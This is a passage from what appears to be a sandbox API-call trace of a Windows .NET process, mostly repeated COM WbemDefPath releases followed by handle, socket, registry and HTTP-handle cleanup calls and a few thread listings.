(in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.650] WbemDefPath:IUnknown:Release (This=0x661780) returned 0x1 [0281.650] WbemDefPath:IUnknown:Release (This=0x661780) returned 0x0 [0281.650] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.650] WbemDefPath:IUnknown:Release (This=0x6617f0) returned 0x1 [0281.650] WbemDefPath:IUnknown:Release (This=0x6617f0) returned 0x0 [0281.650] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.650] WbemDefPath:IUnknown:Release (This=0x661390) returned 0x1 [0281.650] WbemDefPath:IUnknown:Release (This=0x661390) returned 0x0 [0281.650] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.650] WbemDefPath:IUnknown:Release (This=0x661630) returned 0x1 [0281.650] WbemDefPath:IUnknown:Release (This=0x661630) returned 0x0 [0281.650] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.650] WbemDefPath:IUnknown:Release (This=0x5515458) returned 0x1 [0281.650] WbemDefPath:IUnknown:Release (This=0x5515458) returned 0x0 [0281.650] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.650] WbemDefPath:IUnknown:Release (This=0x55153e8) returned 0x1 [0281.650] WbemDefPath:IUnknown:Release (This=0x55153e8) returned 0x0 [0281.650] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.650] WbemDefPath:IUnknown:Release (This=0x5514d58) returned 0x1 [0281.650] WbemDefPath:IUnknown:Release (This=0x5514d58) returned 0x0 [0281.651] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.651] WbemDefPath:IUnknown:Release (This=0x5514968) returned 0x1 [0281.651] WbemDefPath:IUnknown:Release (This=0x5514968) returned 0x0 [0281.651] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.651] WbemDefPath:IUnknown:Release (This=0x55146c8) returned 0x1 [0281.651] WbemDefPath:IUnknown:Release (This=0x55146c8) returned 0x0 [0281.651] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.651] WbemDefPath:IUnknown:Release (This=0x55151b8) returned 0x1 [0281.651] WbemDefPath:IUnknown:Release (This=0x55151b8) returned 0x0 [0281.651] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.651] WbemDefPath:IUnknown:Release (This=0x5514c08) returned 0x1 [0281.651] WbemDefPath:IUnknown:Release (This=0x5514c08) returned 0x0 [0281.651] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.651] WbemDefPath:IUnknown:Release (This=0x5514b28) returned 0x1 [0281.651] WbemDefPath:IUnknown:Release (This=0x5514b28) returned 0x0 [0281.651] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.651] WbemDefPath:IUnknown:Release (This=0x5515228) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x5515228) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514f88) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514f88) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x5515298) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x5515298) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514f18) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514f18) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514dc8) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514dc8) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514e38) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514e38) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514738) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514738) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x5515308) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x5515308) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x55147a8) returned 0x1 [0281.652] WbemDefPath:IUnknown:Release (This=0x55147a8) returned 0x0 [0281.652] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.652] WbemDefPath:IUnknown:Release (This=0x5514888) returned 0x1 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514888) returned 0x0 [0281.653] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514ea8) returned 0x1 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514ea8) returned 0x0 [0281.653] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514818) returned 0x1 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514818) returned 0x0 [0281.653] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514ab8) returned 0x1 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514ab8) returned 0x0 [0281.653] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.653] WbemDefPath:IUnknown:Release (This=0x55148f8) returned 0x1 [0281.653] WbemDefPath:IUnknown:Release (This=0x55148f8) returned 0x0 [0281.653] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.653] WbemDefPath:IUnknown:Release (This=0x55149d8) returned 0x1 [0281.653] WbemDefPath:IUnknown:Release (This=0x55149d8) returned 0x0 [0281.653] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514ff8) returned 0x1 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514ff8) returned 0x0 [0281.653] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.653] WbemDefPath:IUnknown:Release (This=0x5514a48) returned 0x1 [0281.654] WbemDefPath:IUnknown:Release (This=0x5514a48) returned 0x0 [0281.654] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.654] WbemDefPath:IUnknown:Release (This=0x5514b98) returned 0x1 [0281.654] WbemDefPath:IUnknown:Release (This=0x5514b98) returned 0x0 [0281.654] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.654] WbemDefPath:IUnknown:Release (This=0x5515068) returned 0x1 [0281.654] WbemDefPath:IUnknown:Release (This=0x5515068) returned 0x0 [0281.654] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.654] WbemDefPath:IUnknown:Release (This=0x5514c78) returned 0x1 [0281.654] WbemDefPath:IUnknown:Release (This=0x5514c78) returned 0x0 [0281.654] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.654] WbemDefPath:IUnknown:Release (This=0x5514ce8) returned 0x1 [0281.654] WbemDefPath:IUnknown:Release (This=0x5514ce8) returned 0x0 [0281.654] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.654] WbemDefPath:IUnknown:Release (This=0x55150d8) returned 0x1 [0281.654] WbemDefPath:IUnknown:Release (This=0x55150d8) returned 0x0 [0281.654] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.654] WbemDefPath:IUnknown:Release (This=0x5515148) returned 0x1 [0281.654] WbemDefPath:IUnknown:Release (This=0x5515148) returned 0x0 [0281.654] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.654] WbemDefPath:IUnknown:Release (This=0x5515378) returned 0x1 [0281.654] WbemDefPath:IUnknown:Release (This=0x5515378) returned 0x0 [0281.654] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.654] WbemDefPath:IUnknown:Release (This=0x55154c8) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x55154c8) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.655] WbemDefPath:IUnknown:Release (This=0x5515538) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x5515538) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.655] WbemDefPath:IUnknown:Release (This=0x55155a8) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x55155a8) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.655] WbemDefPath:IUnknown:Release (This=0x5515618) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x5515618) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a698) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a698) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a008) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a008) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a938) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a938) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a2a8) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a2a8) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a628) returned 0x1 [0281.655] WbemDefPath:IUnknown:Release (This=0x552a628) returned 0x0 [0281.655] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a078) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a078) returned 0x0 [0281.656] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x5529eb8) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x5529eb8) returned 0x0 [0281.656] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a548) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a548) returned 0x0 [0281.656] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a5b8) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a5b8) returned 0x0 [0281.656] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a9a8) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a9a8) returned 0x0 [0281.656] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a7e8) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a7e8) returned 0x0 [0281.656] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a238) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a238) returned 0x0 [0281.656] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a858) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x552a858) returned 0x0 [0281.656] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.656] WbemDefPath:IUnknown:Release (This=0x5529c88) returned 0x1 [0281.656] WbemDefPath:IUnknown:Release (This=0x5529c88) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a318) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a318) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a3f8) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a3f8) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x5529f28) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x5529f28) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a8c8) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a8c8) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x5529c18) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x5529c18) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x5529cf8) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x5529cf8) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a708) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a708) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a778) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a778) returned 0x0 [0281.657] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a388) returned 0x1 [0281.657] WbemDefPath:IUnknown:Release (This=0x552a388) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a1c8) returned 0x1 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a1c8) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x5529d68) returned 0x1 [0281.658] WbemDefPath:IUnknown:Release (This=0x5529d68) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x5529dd8) returned 0x1 [0281.658] WbemDefPath:IUnknown:Release (This=0x5529dd8) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a468) returned 0x1 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a468) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x5529e48) returned 0x1 [0281.658] WbemDefPath:IUnknown:Release (This=0x5529e48) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x5529f98) returned 0x1 [0281.658] WbemDefPath:IUnknown:Release (This=0x5529f98) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a0e8) returned 0x1 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a0e8) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a158) returned 0x1 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a158) returned 0x0 [0281.658] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.658] WbemDefPath:IUnknown:Release (This=0x552a4d8) returned 0x1 [0281.659] WbemDefPath:IUnknown:Release (This=0x552a4d8) returned 0x0 [0281.659] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.659] WbemDefPath:IUnknown:Release (This=0x552ab68) returned 0x1 [0281.659] WbemDefPath:IUnknown:Release (This=0x552ab68) returned 0x0 [0281.659] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.659] WbemDefPath:IUnknown:Release (This=0x552aa18) returned 0x1 [0281.659] WbemDefPath:IUnknown:Release (This=0x552aa18) returned 0x0 [0281.659] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.659] WbemDefPath:IUnknown:Release (This=0x552aa88) returned 0x1 [0281.659] WbemDefPath:IUnknown:Release (This=0x552aa88) returned 0x0 [0281.659] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.659] WbemDefPath:IUnknown:Release (This=0x552aaf8) returned 0x1 [0281.659] WbemDefPath:IUnknown:Release (This=0x552aaf8) returned 0x0 [0281.659] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.659] WbemDefPath:IUnknown:Release (This=0x5542660) returned 0x1 [0281.659] WbemDefPath:IUnknown:Release (This=0x5542660) returned 0x0 [0281.659] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.659] WbemDefPath:IUnknown:Release (This=0x5542890) returned 0x1 [0281.659] WbemDefPath:IUnknown:Release (This=0x5542890) returned 0x0 [0281.659] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.659] WbemDefPath:IUnknown:Release (This=0x5542120) returned 0x1 [0281.659] WbemDefPath:IUnknown:Release (This=0x5542120) returned 0x0 [0281.660] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.660] WbemDefPath:IUnknown:Release (This=0x5542190) returned 0x1 [0281.660] WbemDefPath:IUnknown:Release (This=0x5542190) returned 0x0 [0281.660] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.660] WbemDefPath:IUnknown:Release (This=0x55422e0) returned 0x1 [0281.660] WbemDefPath:IUnknown:Release (This=0x55422e0) returned 0x0 [0281.660] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.660] WbemDefPath:IUnknown:Release (This=0x5542970) returned 0x1 [0281.660] WbemDefPath:IUnknown:Release (This=0x5542970) returned 0x0 [0281.660] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.660] WbemDefPath:IUnknown:Release (This=0x55427b0) returned 0x1 [0281.660] WbemDefPath:IUnknown:Release (This=0x55427b0) returned 0x0 [0281.660] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.660] WbemDefPath:IUnknown:Release (This=0x55425f0) returned 0x1 [0281.660] WbemDefPath:IUnknown:Release (This=0x55425f0) returned 0x0 [0281.660] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.660] WbemDefPath:IUnknown:Release (This=0x5542ac0) returned 0x1 [0281.660] WbemDefPath:IUnknown:Release (This=0x5542ac0) returned 0x0 [0281.660] IUnknown:Release (This=0x553aac8) returned 0x0 [0281.664] IUnknown:Release (This=0x5539478) returned 0x0 [0281.664] IUnknown:Release (This=0x553a468) returned 0x0 [0281.818] CoGetContextToken (in: pToken=0x422fc30 | out: pToken=0x422fc30) returned 0x0 [0281.819] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.819] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0281.819] WbemLocator:IUnknown:Release (This=0x67f270) returned 0x0 [0281.819] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.819] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x1 [0281.819] WbemLocator:IUnknown:Release (This=0x54b54f0) returned 0x0 [0281.842] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.842] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x1 [0281.843] WbemLocator:IUnknown:Release (This=0x54b54a0) returned 0x0 [0281.843] IUnknown:Release (This=0x601a88) returned 0x0 [0281.843] CoGetContextToken (in: pToken=0x422fc30 | out: pToken=0x422fc30) returned 0x0 [0281.843] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.843] WbemDefPath:IUnknown:Release (This=0x5542b30) returned 0x1 [0281.843] WbemDefPath:IUnknown:Release (This=0x5542b30) returned 0x0 [0281.843] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.843] WbemDefPath:IUnknown:Release (This=0x5542ba0) returned 0x1 [0281.843] WbemDefPath:IUnknown:Release (This=0x5542ba0) returned 0x0 [0281.843] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.843] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x1 [0281.844] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x0 [0281.844] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.844] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x1 [0281.844] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x0 [0281.845] GdipDisposeImage (image=0x52a1f08) returned 0x0 [0314.094] FreeLibrary (hLibModule=0x6cf70000) returned 1 [0314.137] FreeLibrary (hLibModule=0x6cea0000) returned 1 [0314.176] ??3@YAXPAX@Z () returned 0x1 [0314.180] LocalFree (hMem=0x6077c8) returned 0x0 [0314.181] EtwEventUnregister (RegHandle=0x625870) returned 0x0 [0314.181] EtwEventUnregister (RegHandle=0x660308) returned 0x0 [0314.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x51c [0314.186] PostMessageW (hWnd=0x70276, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0314.186] CoGetContextToken (in: pToken=0x422f80c | out: pToken=0x422f80c) returned 0x0 [0314.186] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x422f830 | out: ppvObject=0x422f830*=0x601a94) returned 0x0 [0314.187] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x422f85c | out: pThreadType=0x422f85c*=0) returned 0x0 [0314.187] IUnknown:Release (This=0x601a94) returned 0x0 [0314.857] CoGetContextToken (in: pToken=0x422f824 | out: pToken=0x422f824) returned 0x0 [0314.857] IUnknown:QueryInterface (in: This=0x601a88, riid=0x6bf94564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x422f848 | out: ppvObject=0x422f848*=0x601a94) returned 0x0 [0314.857] IComThreadingInfo:GetCurrentThreadType (in: This=0x601a94, pThreadType=0x422f874 | out: pThreadType=0x422f874*=0) returned 0x0 [0314.857] IUnknown:Release (This=0x601a94) returned 0x0 [0314.890] EtwEventUnregister (RegHandle=0x626bf0) returned 0x0 [0314.893] CloseHandle (hObject=0x3b4) returned 1 [0314.896] UnmapViewOfFile (lpBaseAddress=0x5280000) returned 1 [0314.899] CloseHandle (hObject=0x304) returned 1 [0314.901] CloseHandle (hObject=0x630) returned 1 [0314.902] setsockopt (s=0x548, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0314.906] closesocket (s=0x548) returned 0 [0314.907] CloseHandle (hObject=0x54c) returned 1 [0314.907] setsockopt (s=0x540, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0314.907] closesocket (s=0x540) returned 0 [0314.910] CloseHandle (hObject=0x544) returned 1 [0314.910] CloseHandle (hObject=0x51c) returned 1 [0314.910] CloseHandle (hObject=0x53c) returned 1 [0314.911] CloseHandle (hObject=0x538) returned 1 [0314.911] CloseHandle (hObject=0x520) returned 1 [0314.912] CloseHandle (hObject=0x440) returned 1 [0314.912] UnmapViewOfFile (lpBaseAddress=0x51c0000) returned 1 [0314.913] CloseHandle (hObject=0x514) returned 1 [0314.914] WinHttpCloseHandle (hInternet=0x5d6ed0) returned 1 [0314.916] CloseHandle (hObject=0x3c0) returned 1 [0314.916] CloseHandle (hObject=0x4cc) returned 1 [0314.917] CloseHandle (hObject=0x4c8) returned 1 [0314.917] RegCloseKey (hKey=0x4c4) returned 0x0 [0314.917] CloseHandle (hObject=0x4c0) returned 1 [0314.918] RegCloseKey (hKey=0x4bc) returned 0x0 [0314.918] CloseHandle (hObject=0x380) returned 1 [0314.919] CloseHandle (hObject=0x4b8) returned 1 [0314.919] RegCloseKey (hKey=0x4b4) returned 0x0 [0314.919] RegCloseKey (hKey=0x4b0) returned 0x0 [0314.920] CloseHandle (hObject=0x498) returned 1 [0314.920] setsockopt (s=0x48c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0314.920] closesocket (s=0x48c) returned 0 [0314.921] CloseHandle (hObject=0x490) returned 1 [0314.921] setsockopt (s=0x484, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0314.921] closesocket (s=0x484) returned 0 [0314.922] CloseHandle (hObject=0x488) returned 1 [0314.922] CloseHandle (hObject=0x44c) returned 1 [0314.922] CloseHandle (hObject=0x2fc) returned 1 [0314.922] CloseHandle (hObject=0x3b8) returned 1 [0314.923] CloseHandle (hObject=0x2f8) returned 1 [0314.923] CloseHandle (hObject=0x2f4) returned 1 [0314.925] setsockopt (s=0x550, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0314.925] closesocket (s=0x550) returned 0 [0314.928] setsockopt (s=0x348, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0314.928] closesocket (s=0x348) returned 0 [0314.929] CloseHandle (hObject=0x310) returned 1 [0314.931] RegCloseKey (hKey=0x80000004) returned 0x0 [0314.935] CoGetContextToken (in: pToken=0x422f878 | out: pToken=0x422f878) returned 0x0 [0314.935] CoGetContextToken (in: pToken=0x422f800 | out: pToken=0x422f800) returned 0x0 [0314.935] WbemDefPath:IUnknown:Release (This=0x6619b0) returned 0x1 [0314.935] WbemDefPath:IUnknown:Release (This=0x6619b0) returned 0x0 Thread: id = 10 os_tid = 0xca4 Thread: id = 11 os_tid = 0xdac Thread: id = 12 os_tid = 0x9bc Thread: id = 13 os_tid = 0x468 [0253.676] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0253.677] RoInitialize () returned 0x1 [0253.677] RoUninitialize () returned 0x0 [0253.681] SetConsoleCtrlHandler (HandlerRoutine=0x4e107f6, Add=1) returned 1 [0253.681] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0253.682] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0253.683] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.3ce0bb8.0", lpWndClass=0x21b4b7c | out: lpWndClass=0x21b4b7c) returned 0 [0253.685] 